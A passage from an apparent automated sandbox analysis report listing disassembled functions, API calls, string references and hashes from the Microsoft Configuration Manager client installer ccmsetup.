                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchH_prolog3_catch_Thread
                                                                                          • String ID: CcmUtilLib::CcmGetTransportCertificateSelectionCriteria$Software\Microsoft\CCM\Security$Transport Certificate Selection Criteria
                                                                                          • API String ID: 1198108500-1073261922
                                                                                          • Opcode ID: eaeeb6fd44689da629af16de47c55e5ea1bf96223930d12102658531f35c1af6
                                                                                          • Instruction ID: 21e7ed36acf905c605805e439f17baa739b9d3cc11603fb2fb5060119f19d235
                                                                                          • Opcode Fuzzy Hash: eaeeb6fd44689da629af16de47c55e5ea1bf96223930d12102658531f35c1af6
                                                                                          • Instruction Fuzzy Hash: DBF02831A4175ADBCB21EBA889167EC7E326F50710F144019B5406B3C6CB744B0087D1
                                                                                          Function 00593448 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000000,00000001,?,00001000), ref: 00593491
                                                                                          • GetDesktopWindow.USER32 ref: 005934A8
                                                                                          • MessageBoxW.USER32(00000000), ref: 005934AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: DesktopLoadMessageStringWindow
                                                                                          • String ID: ccmsetup
                                                                                          • API String ID: 3689829364-3595408352
                                                                                          • Opcode ID: 7e343b005b22e17f592d606ee32e0ce97f2955a47a539bbb64e2597da0e77bb6
                                                                                          • Instruction ID: f6e26654deec0a223ff15a173577caacb871bb846e7d60022cb69696a6523819
                                                                                          • Opcode Fuzzy Hash: 7e343b005b22e17f592d606ee32e0ce97f2955a47a539bbb64e2597da0e77bb6
                                                                                          • Instruction Fuzzy Hash: AEF06DB1805259BFDB21CBA08C0DFDA3B7DAB04701F050496F605970A2EBB55A94CF61
                                                                                          Function 0061E477 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 0061E47E
                                                                                            • Part of subcall function 006109E6: __EH_prolog3_catch.LIBCMT ref: 006109ED
                                                                                            • Part of subcall function 006109E6: EnterCriticalSection.KERNEL32(?,00000010,00619DDF,00000000,?,?,00615238,?,CCM::Utility::CcmIsInConnectedStandby,00000020,005F1472,?), ref: 006109F7
                                                                                            • Part of subcall function 00619F74: __EH_prolog3_catch.LIBCMT ref: 00619F7B
                                                                                            • Part of subcall function 00619F74: GetCurrentThreadId.KERNEL32 ref: 00619FD7
                                                                                            • Part of subcall function 00619F74: __CxxThrowException@8.LIBCMT ref: 0061A0FB
                                                                                            • Part of subcall function 00610A36: __EH_prolog3_catch.LIBCMT ref: 00610A3D
                                                                                            • Part of subcall function 00610A36: LeaveCriticalSection.KERNEL32(?,00000010,00619E05,00000000,?,?,00615238,?,CCM::Utility::CcmIsInConnectedStandby,00000020,005F1472,?), ref: 00610A47
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CriticalSection$CurrentEnterException@8H_prolog3LeaveThreadThrow
                                                                                          • String ID: Client$HttpsState$Software\Microsoft\CCM
                                                                                          • API String ID: 4236938090-2389877349
                                                                                          • Opcode ID: 0973cf338fe4607c2c7b86fe583a01f0fe101fbbb1470576992093daa462175c
                                                                                          • Instruction ID: 2bdd6cd192b9a9a7a4e20ad51012c0a23c4280a4920954fa7ac72fb49d8d4844
                                                                                          • Opcode Fuzzy Hash: 0973cf338fe4607c2c7b86fe583a01f0fe101fbbb1470576992093daa462175c
                                                                                          • Instruction Fuzzy Hash: 9BE0E570A80305BBDF10EA948C02BED2A667B95B10F408209B0207F2C2CFB80B458BA5
                                                                                          Function 00583274 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 23threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058329C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3844449486
                                                                                          • Opcode ID: d23a4fca912c68bc5ef3e82501bdf26487917e0813ef93cbd5928f8e1af283d7
                                                                                          • Instruction ID: ffc905f789d33ddbd6f0332291206da60ec4e39965f998d9df3dd6c70a4bb93a
                                                                                          • Opcode Fuzzy Hash: d23a4fca912c68bc5ef3e82501bdf26487917e0813ef93cbd5928f8e1af283d7
                                                                                          • Instruction Fuzzy Hash: 56E0D8B0584288EACB21F761CC0AFEE3E65BF85F04F594084BE0536282D7748682C733
                                                                                          Function 005831F3 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 22threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058321B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3844449486
                                                                                          • Opcode ID: d775721f218df84c958f797b7f2cf5ac600622cbcc3689a49ac95ab8f5be06a0
                                                                                          • Instruction ID: ffb6959d0a478a4bcde9ae26e79cd96e042389e34753d0a9e8e41f7bed87abc6
                                                                                          • Opcode Fuzzy Hash: d775721f218df84c958f797b7f2cf5ac600622cbcc3689a49ac95ab8f5be06a0
                                                                                          • Instruction Fuzzy Hash: 6FE0D8B0984298A6DB10F7208D0AFEE3F16BB96B00F0900C8FA0536282D7744685C771
                                                                                          Function 0058E004 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 11threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058E017
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0058E023
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058E012
                                                                                          • CopyFileLocal(m_sMsiFile, sMsiFile), xrefs: 0058E00D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CopyFileLocal(m_sMsiFile, sMsiFile)$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-4156931702
                                                                                          • Opcode ID: 1169bfc18e400349f06162310202c2673158a4aa2cbd57978cdd05a909f50d2e
                                                                                          • Instruction ID: 2898274f7cabbd3f86883b3bd68652c6b24f19146463e66512081e7649966ae3
                                                                                          • Opcode Fuzzy Hash: 1169bfc18e400349f06162310202c2673158a4aa2cbd57978cdd05a909f50d2e
                                                                                          • Instruction Fuzzy Hash: 21C012A01C43447D820187614D07CB13FA79A06B113074895E940EB0F2818054825B21
                                                                                          Function 0058E0F7 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 10threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058E10A
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058E105
                                                                                          • ccmsetup.cpp, xrefs: 0058E116
                                                                                          • CopyFileLocal(m_sMstFile, sMstFile), xrefs: 0058E100
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CopyFileLocal(m_sMstFile, sMstFile)$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3486639633
                                                                                          • Opcode ID: ab111bd75a53ad67d0336263ff1a18ecbc466e375ba82d438d2f9cea2c7f863c
                                                                                          • Instruction ID: 56aa4905c74cac211f35ca6529bc8feaab4320d47b00bf10145e39ffee6da722
                                                                                          • Opcode Fuzzy Hash: ab111bd75a53ad67d0336263ff1a18ecbc466e375ba82d438d2f9cea2c7f863c
                                                                                          • Instruction Fuzzy Hash: E9C012111C5340EFE20467A00D0BD353FE5DA19B06707848DA241960D2D04411019B25
                                                                                          Function 005DE084 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005DE0BA
                                                                                          • __isleadbyte_l.LIBCMT ref: 005DE0E8
                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005DE116
                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005DE14C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                          • String ID:
                                                                                          • API String ID: 3058430110-0
                                                                                          • Opcode ID: bf43949b5fcb1a2f4acb3bb5c885f55539adc813a98c914c6f171708decd8f6d
                                                                                          • Instruction ID: de07eb21ea20660d8952f02ba51277f26463161b84bec9741ef4e335f62d1df2
                                                                                          • Opcode Fuzzy Hash: bf43949b5fcb1a2f4acb3bb5c885f55539adc813a98c914c6f171708decd8f6d
                                                                                          • Instruction Fuzzy Hash: AC318331604256AFDB31EE69CC4AB6B7FB5FF41310F15452BE8148B2A0D771E851DB90
                                                                                          Function 005B80F5 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005B80FC
                                                                                          • GetTickCount.KERNEL32 ref: 005B8101
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B8152
                                                                                          • CoCreateGuid.OLE32(?,?), ref: 005B8186
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCreateCurrentGuidH_prolog3H_prolog3_ThreadTick
                                                                                          • String ID:
                                                                                          • API String ID: 1729703813-0
                                                                                          • Opcode ID: e480c3ce251b10e83bb056430778a6ddc4fda7d230a33af25f6568512614298f
                                                                                          • Instruction ID: ef6133cb192f26e972968f3e29145820339774689bd78773f61334f541c6bd3a
                                                                                          • Opcode Fuzzy Hash: e480c3ce251b10e83bb056430778a6ddc4fda7d230a33af25f6568512614298f
                                                                                          • Instruction Fuzzy Hash: 3131D331902209DFCF04DFA8C886AEE7FB9BB54300F14106EE541A7291DE74AA46CB60
                                                                                          Function 0060A06C Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 0060A073
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • SysFreeString.OLEAUT32(00831D5C), ref: 0060A107
                                                                                          • SysFreeString.OLEAUT32(00831B04), ref: 0060A11A
                                                                                          • SysFreeString.OLEAUT32(00000008), ref: 0060A123
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString$H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 3629739108-0
                                                                                          • Opcode ID: 24925aca454b06dfc56f51f4cd00970a9899a7ebdae214e72d00b2ba804a1c92
                                                                                          • Instruction ID: ee14483a1cae9d45bc86f5caed35893517ee49324d5490f24186c317a476090a
                                                                                          • Opcode Fuzzy Hash: 24925aca454b06dfc56f51f4cd00970a9899a7ebdae214e72d00b2ba804a1c92
                                                                                          • Instruction Fuzzy Hash: 302128B1D4020AEFCB14DF98C985BEEBBB6BF44340F20816AE1116B2E1C7B05E45DB91
                                                                                          Function 005FE471 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 005FE4C9
                                                                                          • VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 005FE4D2
                                                                                          • VerSetConditionMask.KERNEL32(00000000,?,00000020,?,?,00000001,?), ref: 005FE4E8
                                                                                          • VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 005FE4F7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConditionMask$InfoVerifyVersion
                                                                                          • String ID:
                                                                                          • API String ID: 2793162063-0
                                                                                          • Opcode ID: 51e78da95fef17883491cffd406bd2862cd1922fc39b47d9744b8c33aa7a66dc
                                                                                          • Instruction ID: 41553f1ae100bbc65364517418a495cccf5dd7a80d6a38822fa4e357baecb679
                                                                                          • Opcode Fuzzy Hash: 51e78da95fef17883491cffd406bd2862cd1922fc39b47d9744b8c33aa7a66dc
                                                                                          • Instruction Fuzzy Hash: C4114F71A4030CBBEB21DF65DC0AFEB7B79EBC8710F00445AFA049B281C6759A51CB94
                                                                                          Function 005D027D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005D0284
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          Strings
                                                                                          • Failed to verify %s file hash; will skip installation of this file. Error 0x%x, xrefs: 005D0372
                                                                                          • PackageItemDetails::ValidateItemHashes, xrefs: 005D029A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch_
                                                                                          • String ID: Failed to verify %s file hash; will skip installation of this file. Error 0x%x$PackageItemDetails::ValidateItemHashes
                                                                                          • API String ID: 863784098-551186493
                                                                                          • Opcode ID: 67dd2f605f650bc26c86edd5d29a8e12efeca28055f5c6f98f4a306f71c906fc
                                                                                          • Instruction ID: a887c7c5847b2e8a16422e68d063e4dbd24a1598441f87a0519b301e359485d8
                                                                                          • Opcode Fuzzy Hash: 67dd2f605f650bc26c86edd5d29a8e12efeca28055f5c6f98f4a306f71c906fc
                                                                                          • Instruction Fuzzy Hash: CF41B171905248EFDF11EBA8C949BEDBFB9BF50304F24845AE544AB282C7706A05DB61
                                                                                          Function 005A923F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID: Operator %s is not valid!$RunDWORDComparison
                                                                                          • API String ID: 3886170330-3885480953
                                                                                          • Opcode ID: 5b79a613d03dfa9f5e129a5f4841f3ca10e81c37d985843d9286a1d037f19daf
